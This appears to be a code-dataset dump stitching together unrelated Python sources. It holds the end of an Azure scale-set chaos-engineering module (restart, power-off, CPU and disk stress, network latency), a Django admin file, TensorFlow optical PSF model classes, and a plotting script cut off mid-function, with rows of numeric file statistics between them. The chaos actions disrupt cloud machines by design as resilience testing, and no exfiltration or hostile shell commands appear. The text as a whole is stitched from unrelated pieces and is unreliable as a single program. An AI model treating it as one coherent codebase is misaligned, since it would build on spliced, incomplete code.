affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def restart(vmss_filter: str = None,
instance_filter: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Restart instances from the VMSS.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted a random VMSS from your subscription is selected.
instance_filter : str, optional
KQLL: Filter the instances of the selected virtual machine scale set(s). If omitted
a random instance from your VMSS is selected.
"""
logger.debug(
"Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}'".format(
restart.__name__, configuration, vmss_filter, instance_filter))
clnt = client.init()
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
try:
poller = clnt.virtual_machine_scale_set_vms.begin_restart(
vmss['resourceGroup'], vmss['name'], instance['instance_id'])
except HttpResponseError as e:
raise FailedActivity(e.message)
# collect future results
futures.append(
executor.submit(__long_poll, restart.__name__, instance, poller, configuration))
# wait for results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def stop(vmss_filter: str = None,
instance_filter: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Stop instances from the VMSS.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted a random VMSS from your subscription is selected.
instance_filter : str, optional
KQLL: Filter the instances of the selected virtual machine scale set(s). If omitted
a random instance from your VMSS is selected.
"""
logger.debug(
"Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}'".format(
stop.__name__, configuration, vmss_filter, instance_filter))
clnt = client.init()
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
try:
poller = clnt.virtual_machine_scale_set_vms.begin_power_off(
vmss['resourceGroup'], vmss['name'], instance['instance_id'])
except HttpResponseError as e:
raise FailedActivity(e.message)
# collect future results
futures.append(
executor.submit(__long_poll, stop.__name__, instance, poller, configuration))
# wait for results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def deallocate(vmss_filter: str = None,
instance_filter: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Deallocate instances from the VMSS.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted a random VMSS from your subscription is selected.
instance_filter : str, optional
KQLL: Filter the instances of the selected virtual machine scale set(s). If omitted
a random instance from your VMSS is selected.
"""
logger.debug(
"Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}'".format(
deallocate.__name__, configuration, vmss_filter, instance_filter))
clnt = client.init()
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
logger.debug("Deallocating instance: {}".format(instance['name']))
try:
poller = clnt.virtual_machine_scale_set_vms.begin_deallocate(
vmss['resourceGroup'], vmss['name'], instance['instance_id'])
except HttpResponseError as e:
raise FailedActivity(e.message)
# collect future results
futures.append(
executor.submit(
__long_poll, deallocate.__name__, instance, poller, configuration))
# wait for results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def stress_cpu(vmss_filter: str = None,
instance_filter: str = None,
duration: int = 120,
configuration: Configuration = None,
secrets: Secrets = None):
"""Stress CPU up to 100% for instances from the VMSS.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted a random VMSS from your subscription is selected.
instance_filter : str, optional
KQLL: Filter the instances of the selected virtual machine scale set(s). If omitted
a random instance from your VMSS is selected.
duration : int, optional
Duration of the stress test (in seconds) that generates high CPU usage. Defaults to 120 seconds.
"""
operation_name = stress_cpu.__name__
logger.debug("Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}', duration='{}'".format(
operation_name, configuration, vmss_filter, instance_filter, duration))
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
clnt = client.init()
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
command_id, script_content = command.prepare(instance, operation_name)
parameters = command.fill_parameters(command_id, script_content, duration=duration)
# collect future results
futures.append(
executor.submit(
__long_poll_command, operation_name, vmss['resourceGroup'], instance, parameters, clnt))
# wait for future results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def burn_io(vmss_filter: str = None,
instance_filter: str = None,
duration: int = 60,
path: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Simulate heavy disk I/O operations.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted a random VMSS from your subscription is selected.
instance_filter : str, optional
KQLL: Filter the instances of the selected virtual machine scale set(s). If omitted
a random instance from your VMSS is selected.
duration : int, optional
Duration of the stress test (in seconds) that generates high disk I/O operations. Defaults to 60 seconds.
path : str, optional
The absolute path to write the stress file into. Defaults to ``C:\\burn`` for Windows
clients and ``/root/burn`` for Linux clients.
"""
operation_name = burn_io.__name__
logger.debug(
"Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}', duration='{}',".format(
operation_name, configuration, vmss_filter, instance_filter, duration))
clnt = client.init()
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
command_id, script_content = command.prepare(instance, operation_name)
fill_path = command.prepare_path(instance, path)
parameters = command.fill_parameters(command_id, script_content, duration=duration, path=fill_path)
# collect future results
futures.append(
executor.submit(
__long_poll_command, operation_name, vmss['resourceGroup'], instance, parameters, clnt))
# wait for the results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def fill_disk(vmss_filter: str = None,
instance_filter: Iterable[Mapping[str, any]] = None,
duration: int = 120,
size: int = 1000,
path: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Fill the disk with random data.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted a random VMSS from your subscription is selected.
instance_filter : str, optional
KQLL: Filter the instances of the selected virtual machine scale set(s). If omitted
a random instance from your VMSS is selected.
duration : int, optional
Duration of the stress test (in seconds) that generates random data on disk. Defaults to 120 seconds.
size : int, optional
Size of the stressing file that is generated in Megabytes. Defaults to 1000 MB.
path : str, optional
Location of the stressing file where it is generated. Defaults to ``/root/burn`` on Linux systems
and ``C:\\burn`` on Windows machines.
"""
operation_name = fill_disk.__name__
logger.debug(
"Starting {}: configuration='{}', vmss_filter='{}', instance_filter='{}', "
"duration='{}', size='{}', path='{}'".format(
operation_name, configuration, vmss_filter, instance_filter, duration, size, path))
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
clnt = client.init()
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
command_id, script_content = command.prepare(instance, operation_name)
fill_path = command.prepare_path(instance, path)
parameters = command.fill_parameters(
command_id, script_content, duration=duration, size=size, path=fill_path)
# collect the future results
futures.append(
executor.submit(
__long_poll_command, operation_name, vmss['resourceGroup'], instance, parameters, clnt))
# wait for the results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
def network_latency(vmss_filter: str = None,
instance_filter: str = None,
duration: int = 60,
delay: int = 200,
jitter: int = 50,
network_interface: str = "eth0",
configuration: Configuration = None,
secrets: Secrets = None):
"""Increase the response time on instances.
**Please note**: This action is available only for Linux-based systems.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted a random VMSS from your subscription is selected.
instance_filter : str, optional
KQLL: Filter the instances of the selected virtual machine scale set(s). If omitted
a random instance from your VMSS is selected.
duration : int, optional
Duration of the stress test (in seconds) that generates network latency. Defaults to 60 seconds.
delay : int, optional
Applied delay of the response time in milliseconds. Defaults to 200 milliseconds.
jitter : int, optional
Applied variance of +/- jitter to the delay of the response time in milliseconds. Defaults to 50 milliseconds.
network_interface : str, optional
The network interface where the network latency is applied to. Defaults to local ethernet eth0.
"""
operation_name = network_latency.__name__
logger.debug(
"Starting {}: configuration='{}', filter='{}', duration='{}',"
" delay='{}', jitter='{}', network_interface='{}'".format(
operation_name, configuration, filter, duration, delay, jitter, network_interface))
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
clnt = client.init()
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
command_id, script_content = command.prepare(instance, operation_name)
parameters = command.fill_parameters(
command_id, script_content, duration=duration, delay=delay, jitter=jitter,
network_interface=network_interface)
# collect the future results
futures.append(
executor.submit(
__long_poll_command, operation_name, vmss['resourceGroup'], instance, parameters, clnt))
# wait for the results
for future in concurrent.futures.as_completed(futures):
affected_instance = future.result()
instances_records.add(cleanse.vmss_instance(affected_instance))
vmss['virtualMachines'] = instances_records.output()
vmss_records.add(cleanse.vmss(vmss))
return vmss_records.output_as_dict('resources')
###########################
# PRIVATE HELPER FUNCTIONS
###########################
def __long_poll(activity, instance, poller, configuration):
logger.debug("Waiting for operation '{}' on instance '{}' to finish. Giving priority to other operations.".format(
activity, instance['name']))
poller.result(config.load_timeout(configuration))
logger.debug("Finished operation '{}' on instance '{}'.".format(activity, instance['name']))
return instance
def __long_poll_command(activity, group, instance, parameters, client):
logger.debug("Waiting for operation '{}' on instance '{}' to finish. Giving priority to other operations.".format(
activity, instance['name']))
command.run(group, instance, parameters, client)
logger.debug("Finished operation '{}' on instance '{}'.".format(activity, instance['name']))
return instance
| 40.009921
| 118
| 0.64369
| 2,173
| 20,165
| 5.796595
| 0.0948
| 0.029374
| 0.030168
| 0.034932
| 0.834868
| 0.832566
| 0.817879
| 0.809305
| 0.808034
| 0.782868
| 0
| 0.0029
| 0.264567
| 20,165
| 503
| 119
| 40.089463
| 0.84646
| 0.239623
| 0
| 0.774908
| 0
| 0
| 0.093094
| 0.005722
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0369
| false
| 0
| 0.0369
| 0
| 0.110701
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
56cc369f63491d423777cb8420ec89165c2fb46d
| 197
|
py
|
Python
|
mmb_repo/mmb_data/admin.py
|
ajay2611/mmb
|
af8756fec0eab0facf7f7fa29f81157de8dec7b5
|
[
"BSD-3-Clause"
] | 2
|
2017-11-10T09:12:28.000Z
|
2018-05-27T00:07:19.000Z
|
mmb_repo/mmb_data/admin.py
|
ajay2611/mmb
|
af8756fec0eab0facf7f7fa29f81157de8dec7b5
|
[
"BSD-3-Clause"
] | 1
|
2015-11-02T06:03:18.000Z
|
2015-11-02T06:03:18.000Z
|
mmb_repo/mmb_data/admin.py
|
ajay2611/mmb
|
af8756fec0eab0facf7f7fa29f81157de8dec7b5
|
[
"BSD-3-Clause"
] | 1
|
2018-04-10T07:11:07.000Z
|
2018-04-10T07:11:07.000Z
|
from django.contrib import admin
from .models import Genre, Instrument, Song
admin.site.register(Genre)
admin.site.register(Instrument)
admin.site.register(Song)
# admin.site.register(Followers)
| 21.888889
| 43
| 0.807107
| 27
| 197
| 5.888889
| 0.444444
| 0.226415
| 0.427673
| 0.264151
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086294
| 197
| 8
| 44
| 24.625
| 0.883333
| 0.152284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
56e3a52e31f9399f286aec51564457e091a4d63e
| 14,114
|
py
|
Python
|
wf_psf/tf_alt_psf_models.py
|
tobias-liaudat/wf-psf
|
0ff1a12d06c46bd8599061d227785393fb528d76
|
[
"MIT"
] | 7
|
2022-03-10T10:49:01.000Z
|
2022-03-17T16:06:12.000Z
|
wf_psf/tf_alt_psf_models.py
|
tobias-liaudat/wf-psf
|
0ff1a12d06c46bd8599061d227785393fb528d76
|
[
"MIT"
] | null | null | null |
wf_psf/tf_alt_psf_models.py
|
tobias-liaudat/wf-psf
|
0ff1a12d06c46bd8599061d227785393fb528d76
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow as tf
from wf_psf.tf_layers import TF_poly_Z_field, TF_zernike_OPD, TF_batch_poly_PSF
from wf_psf.tf_layers import TF_NP_poly_OPD, TF_batch_mono_PSF
class TF_SemiParam_field_l2_OPD(tf.keras.Model):
""" PSF field forward model!
Semi parametric model based on the Zernike polynomial basis. The
Parameters
----------
zernike_maps: Tensor(n_batch, opd_dim, opd_dim)
Zernike polynomial maps.
obscurations: Tensor(opd_dim, opd_dim)
Predefined obscurations of the phase.
batch_size: int
Batch sizet
output_Q: float
Oversampling used. This should match the oversampling Q used to generate
the diffraction zero padding that is found in the input `packed_SEDs`.
We call this other Q the `input_Q`.
In that case, we replicate the original sampling of the model used to
calculate the input `packed_SEDs`.
The final oversampling of the generated PSFs with respect to the
original instrument sampling depend on the division `input_Q/output_Q`.
It is not recommended to use `output_Q < 1`.
Although it works with float values it is better to use integer values.
d_max_nonparam: int
Maximum degree of the polynomial for the non-parametric variations.
l2_param: float
Parameter going with the l2 loss on the opd.
output_dim: int
Output dimension of the PSF stamps.
n_zernikes: int
Order of the Zernike polynomial for the parametric model.
d_max: int
Maximum degree of the polynomial for the Zernike coefficient variations.
x_lims: [float, float]
Limits for the x coordinate of the PSF field.
y_lims: [float, float]
Limits for the x coordinate of the PSF field.
coeff_mat: Tensor or None
Initialization of the coefficient matrix defining the parametric psf
field model.
"""
def __init__(
self,
zernike_maps,
obscurations,
batch_size,
output_Q,
d_max_nonparam=3,
l2_param=1e-11,
output_dim=64,
n_zernikes=45,
d_max=2,
x_lims=[0, 1e3],
y_lims=[0, 1e3],
coeff_mat=None,
name='TF_SemiParam_field_l2_OPD'
):
super(TF_SemiParam_field_l2_OPD, self).__init__()
# Inputs: oversampling used
self.output_Q = output_Q
# Inputs: TF_poly_Z_field
self.n_zernikes = n_zernikes
self.d_max = d_max
self.x_lims = x_lims
self.y_lims = y_lims
# Inputs: TF_NP_poly_OPD
self.d_max_nonparam = d_max_nonparam
self.opd_dim = tf.shape(zernike_maps)[1].numpy()
# Inputs: TF_zernike_OPD
# They are not stored as they are memory-heavy
# zernike_maps =[]
# Inputs: TF_batch_poly_PSF
self.batch_size = batch_size
self.obscurations = obscurations
self.output_dim = output_dim
# Inputs: Loss
self.l2_param = l2_param
# Initialize the first layer
self.tf_poly_Z_field = TF_poly_Z_field(
x_lims=self.x_lims, y_lims=self.y_lims, n_zernikes=self.n_zernikes, d_max=self.d_max
)
# Initialize the zernike to OPD layer
self.tf_zernike_OPD = TF_zernike_OPD(zernike_maps=zernike_maps)
# Initialize the non-parametric layer
self.tf_np_poly_opd = TF_NP_poly_OPD(
x_lims=self.x_lims, y_lims=self.y_lims, d_max=self.d_max_nonparam, opd_dim=self.opd_dim
)
# Initialize the batch opd to batch polychromatic PSF layer
self.tf_batch_poly_PSF = TF_batch_poly_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
# Initialize the model parameters with non-default value
if coeff_mat is not None:
self.assign_coeff_matrix(coeff_mat)
def get_coeff_matrix(self):
""" Get coefficient matrix."""
return self.tf_poly_Z_field.get_coeff_matrix()
def assign_coeff_matrix(self, coeff_mat):
""" Assign coefficient matrix."""
self.tf_poly_Z_field.assign_coeff_matrix(coeff_mat)
def set_zero_nonparam(self):
""" Set to zero the non-parametric part."""
self.tf_np_poly_opd.set_alpha_zero()
def set_nonzero_nonparam(self):
""" Set to non-zero the non-parametric part."""
self.tf_np_poly_opd.set_alpha_identity()
def set_trainable_layers(self, param_bool=True, nonparam_bool=True):
""" Set the layers to be trainable or not."""
self.tf_np_poly_opd.trainable = nonparam_bool
self.tf_poly_Z_field.trainable = param_bool
def set_output_Q(self, output_Q, output_dim=None):
""" Set the value of the output_Q parameter.
Useful for generating/predicting PSFs at a different sampling wrt the
observation sampling.
"""
self.output_Q = output_Q
if output_dim is not None:
self.output_dim = output_dim
# Reinitialize the PSF batch poly generator
self.tf_batch_poly_PSF = TF_batch_poly_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
def predict_mono_psfs(self, input_positions, lambda_obs, phase_N):
""" Predict a set of monochromatic PSF at desired positions.
input_positions: Tensor(batch_dim x 2)
lambda_obs: float
Observed wavelength in um.
phase_N: int
Required wavefront dimension. Should be calculated with as:
``simPSF_np = wf.SimPSFToolkit(...)``
``phase_N = simPSF_np.feasible_N(lambda_obs)``
"""
# Initialise the monochromatic PSF batch calculator
tf_batch_mono_psf = TF_batch_mono_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
# Set the lambda_obs and the phase_N parameters
tf_batch_mono_psf.set_lambda_phaseN(phase_N, lambda_obs)
# Calculate parametric part
zernike_coeffs = self.tf_poly_Z_field(input_positions)
param_opd_maps = self.tf_zernike_OPD(zernike_coeffs)
# Calculate the non parametric part
nonparam_opd_maps = self.tf_np_poly_opd(input_positions)
# Add the estimations
opd_maps = tf.math.add(param_opd_maps, nonparam_opd_maps)
# Compute the monochromatic PSFs
mono_psf_batch = tf_batch_mono_psf(opd_maps)
return mono_psf_batch
def predict_opd(self, input_positions):
""" Predict the OPD at some positions.
Parameters
----------
input_positions: Tensor(batch_dim x 2)
Positions to predict the OPD.
Returns
-------
opd_maps : Tensor [batch x opd_dim x opd_dim]
OPD at requested positions.
"""
# Calculate parametric part
zernike_coeffs = self.tf_poly_Z_field(input_positions)
param_opd_maps = self.tf_zernike_OPD(zernike_coeffs)
# Calculate the non parametric part
nonparam_opd_maps = self.tf_np_poly_opd(input_positions)
# Add the estimations
opd_maps = tf.math.add(param_opd_maps, nonparam_opd_maps)
return opd_maps
def call(self, inputs):
"""Define the PSF field forward model.
[1] From positions to Zernike coefficients
[2] From Zernike coefficients to OPD maps
[3] From OPD maps and SED info to polychromatic PSFs
OPD: Optical Path Differences
"""
# Unpack inputs
input_positions = inputs[0]
packed_SEDs = inputs[1]
# Forward model
# Calculate parametric part
zernike_coeffs = self.tf_poly_Z_field(input_positions)
param_opd_maps = self.tf_zernike_OPD(zernike_coeffs)
# Calculate the non parametric part
nonparam_opd_maps = self.tf_np_poly_opd(input_positions)
# Add the estimations
opd_maps = tf.math.add(param_opd_maps, nonparam_opd_maps)
# Add l2 loss on the OPD
self.add_loss(self.l2_param * tf.math.reduce_sum(tf.math.square(opd_maps)))
# Compute the polychromatic PSFs
poly_psfs = self.tf_batch_poly_PSF([opd_maps, packed_SEDs])
return poly_psfs
class TF_PSF_field_model_l2_OPD(tf.keras.Model):
""" Parametric PSF field model!
Fully parametric model based on the Zernike polynomial basis.
Parameters
----------
zernike_maps: Tensor(n_batch, opd_dim, opd_dim)
Zernike polynomial maps.
obscurations: Tensor(opd_dim, opd_dim)
Predefined obscurations of the phase.
batch_size: int
Batch size
l2_param: float
Parameter going with the l2 loss on the opd.
output_dim: int
Output dimension of the PSF stamps.
n_zernikes: int
Order of the Zernike polynomial for the parametric model.
d_max: int
Maximum degree of the polynomial for the Zernike coefficient variations.
x_lims: [float, float]
Limits for the x coordinate of the PSF field.
y_lims: [float, float]
Limits for the x coordinate of the PSF field.
coeff_mat: Tensor or None
Initialization of the coefficient matrix defining the parametric psf
field model.
"""
def __init__(
self,
zernike_maps,
obscurations,
batch_size,
output_Q,
l2_param=1e-11,
output_dim=64,
n_zernikes=45,
d_max=2,
x_lims=[0, 1e3],
y_lims=[0, 1e3],
coeff_mat=None,
name='TF_PSF_field_model_l2_OPD'
):
super(TF_PSF_field_model_l2_OPD, self).__init__()
self.output_Q = output_Q
# Inputs: TF_poly_Z_field
self.n_zernikes = n_zernikes
self.d_max = d_max
self.x_lims = x_lims
self.y_lims = y_lims
# Inputs: TF_zernike_OPD
# They are not stored as they are memory-heavy
# zernike_maps =[]
# Inputs: TF_batch_poly_PSF
self.batch_size = batch_size
self.obscurations = obscurations
self.output_dim = output_dim
# Inputs: Loss
self.l2_param = l2_param
# Initialize the first layer
self.tf_poly_Z_field = TF_poly_Z_field(
x_lims=self.x_lims, y_lims=self.y_lims, n_zernikes=self.n_zernikes, d_max=self.d_max
)
# Initialize the zernike to OPD layer
self.tf_zernike_OPD = TF_zernike_OPD(zernike_maps=zernike_maps)
# Initialize the batch opd to batch polychromatic PSF layer
self.tf_batch_poly_PSF = TF_batch_poly_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
# Initialize the model parameters with non-default value
if coeff_mat is not None:
self.assign_coeff_matrix(coeff_mat)
def get_coeff_matrix(self):
""" Get coefficient matrix."""
return self.tf_poly_Z_field.get_coeff_matrix()
def assign_coeff_matrix(self, coeff_mat):
""" Assign coefficient matrix."""
self.tf_poly_Z_field.assign_coeff_matrix(coeff_mat)
def set_output_Q(self, output_Q, output_dim=None):
""" Set the value of the output_Q parameter.
Useful for generating/predicting PSFs at a different sampling wrt the
observation sampling.
"""
self.output_Q = output_Q
if output_dim is not None:
self.output_dim = output_dim
# Reinitialize the PSF batch poly generator
self.tf_batch_poly_PSF = TF_batch_poly_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
def predict_mono_psfs(self, input_positions, lambda_obs, phase_N):
""" Predict a set of monochromatic PSF at desired positions.
input_positions: Tensor(batch_dim x 2)
lambda_obs: float
Observed wavelength in um.
phase_N: int
Required wavefront dimension. Should be calculated with as:
``simPSF_np = wf.SimPSFToolkit(...)``
``phase_N = simPSF_np.feasible_N(lambda_obs)``
"""
# Initialise the monochromatic PSF batch calculator
tf_batch_mono_psf = TF_batch_mono_PSF(
obscurations=self.obscurations, output_Q=self.output_Q, output_dim=self.output_dim
)
# Set the lambda_obs and the phase_N parameters
tf_batch_mono_psf.set_lambda_phaseN(phase_N, lambda_obs)
# Continue the OPD maps
zernike_coeffs = self.tf_poly_Z_field(input_positions)
opd_maps = self.tf_zernike_OPD(zernike_coeffs)
# Compute the monochromatic PSFs
mono_psf_batch = tf_batch_mono_psf(opd_maps)
return mono_psf_batch
def predict_opd(self, input_positions):
""" Predict the OPD at some positions.
Parameters
----------
input_positions: Tensor(batch_dim x 2)
Positions to predict the OPD.
Returns
-------
opd_maps : Tensor [batch x opd_dim x opd_dim]
OPD at requested positions.
"""
# Continue the OPD maps
zernike_coeffs = self.tf_poly_Z_field(input_positions)
opd_maps = self.tf_zernike_OPD(zernike_coeffs)
return opd_maps
def call(self, inputs):
"""Define the PSF field forward model.
[1] From positions to Zernike coefficients
[2] From Zernike coefficients to OPD maps
[3] From OPD maps and SED info to polychromatic PSFs
OPD: Optical Path Differences
"""
# Unpack inputs
input_positions = inputs[0]
packed_SEDs = inputs[1]
# Continue the forward model
zernike_coeffs = self.tf_poly_Z_field(input_positions)
opd_maps = self.tf_zernike_OPD(zernike_coeffs)
# Add l2 loss on the OPD
self.add_loss(self.l2_param * tf.math.reduce_sum(tf.math.square(opd_maps)))
poly_psfs = self.tf_batch_poly_PSF([opd_maps, packed_SEDs])
return poly_psfs
| 33.76555
| 99
| 0.657007
| 1,943
| 14,114
| 4.477097
| 0.106022
| 0.023451
| 0.014484
| 0.02483
| 0.879067
| 0.859754
| 0.853087
| 0.847339
| 0.83228
| 0.83228
| 0
| 0.006359
| 0.275755
| 14,114
| 417
| 100
| 33.846523
| 0.844649
| 0.416324
| 0
| 0.802548
| 0
| 0
| 0.006732
| 0.006732
| 0
| 0
| 0
| 0
| 0
| 1
| 0.10828
| false
| 0
| 0.025478
| 0
| 0.197452
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85c2560af9cce407afbc8cec3f3bccfdc28fddd2
| 23,390
|
py
|
Python
|
volcanic/plotting3d.py
|
rlaplaza/volcanic
|
31273300c2e96397a489db3653221659847652f9
|
[
"MIT"
] | 1
|
2022-03-07T13:35:39.000Z
|
2022-03-07T13:35:39.000Z
|
volcanic/plotting3d.py
|
rlaplaza/volcanic
|
31273300c2e96397a489db3653221659847652f9
|
[
"MIT"
] | null | null | null |
volcanic/plotting3d.py
|
rlaplaza/volcanic
|
31273300c2e96397a489db3653221659847652f9
|
[
"MIT"
] | 1
|
2022-01-12T13:58:59.000Z
|
2022-01-12T13:58:59.000Z
|
#!/usr/bin/env python
import numpy as np
import scipy.stats as stats
import itertools
import matplotlib
from matplotlib import cm
from matplotlib.ticker import FuncFormatter
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import sklearn as sk
import sklearn.linear_model
from volcanic.helpers import bround
from volcanic.tof import calc_tof, calc_es, calc_s_es
from volcanic.exceptions import MissingDataError
def get_reg_targets(idx1, idx2, d, tags, coeff, regress, mode="k"):
"""Separate regression targets and regressor variables."""
tag1 = tags[idx1]
tag2 = tags[idx2]
tags = tags[regress]
X1 = d[:, idx1].reshape(-1)
X2 = d[:, idx2].reshape(-1)
d1 = d[:, regress]
d2 = d[:, ~regress]
coeff = coeff[regress]
if mode == "t":
d1 = d1[:, ~coeff]
tags = tags[~coeff]
return X1, X2, tag1, tag2, tags, d1, d2, coeff
def plot_ci_manual(t, s_err, n, x, x2, y2, ax=None):
if ax is None:
ax = plt.gca()
ci = (
t
* s_err
* np.sqrt(1 / n + (x2 - np.mean(x)) ** 2 / np.sum((x - np.mean(x)) ** 2))
)
ax.fill_between(x2, y2 + ci, y2 - ci, color="#b9cfe7", alpha=0.6)
return ax
def plot_3d_lsfer(
idx1,
idx2,
d,
tags,
coeff,
regress,
cb="white",
ms="o",
lmargin=5,
rmargin=5,
npoints=100,
plotmode=1,
verb=0,
):
x1base = 20
x2base = 20
X1, X2, tag1, tag2, tags, d, d2, coeff = get_reg_targets(
idx1, idx2, d, tags, coeff, regress, mode="k"
)
d_refill = np.zeros_like(d)
d_refill[~np.isnan(d)] = d[~np.isnan(d)]
lnsteps = range(d.shape[1])
mape = 100
for j in lnsteps[1:-1]:
if verb > 0:
print(f"Plotting regression of {tags[j]}.")
XY = np.vstack([X1, X2, d[:, j]]).T
if isinstance(cb, np.ndarray):
cbi = np.array(cb)[~np.isnan(XY).any(axis=1)]
else:
cbi = cb
if isinstance(ms, np.ndarray):
msi = np.array(ms)[~np.isnan(XY).any(axis=1)]
else:
msi = ms
XYm = XY[np.isnan(XY).any(axis=1)]
XY = XY[~np.isnan(XY).any(axis=1)]
Xm = XYm[:, :2]
Ym = XYm[:, 2]
X = XY[:, :2]
Y = XY[:, 2]
xmax = bround(Y.max() + rmargin, x1base)
xmin = bround(Y.min() - lmargin, x1base)
xint = np.sort(Y)
reg = sk.linear_model.LinearRegression().fit(X, Y)
if verb > 2:
print(
f"Linear model has coefficients : {reg.coef_} \n and intercept {reg.intercept_}"
)
Y_pred = reg.predict(X)
p = reg.coef_
currmape = sk.metrics.mean_absolute_percentage_error(Y, Y_pred)
for k, y in enumerate(Ym):
if not np.isnan(Xm[k, 0]) and not np.isnan(Xm[k, 1]) and np.isnan(Ym[k]):
Ym[k] = reg.predict(Xm[k])
d_refill[np.isnan(d).any(axis=1)][:, j][k] = Ym[k]
elif not np.isnan(Ym[k]) and not np.isnan(Xm[k, 0]):
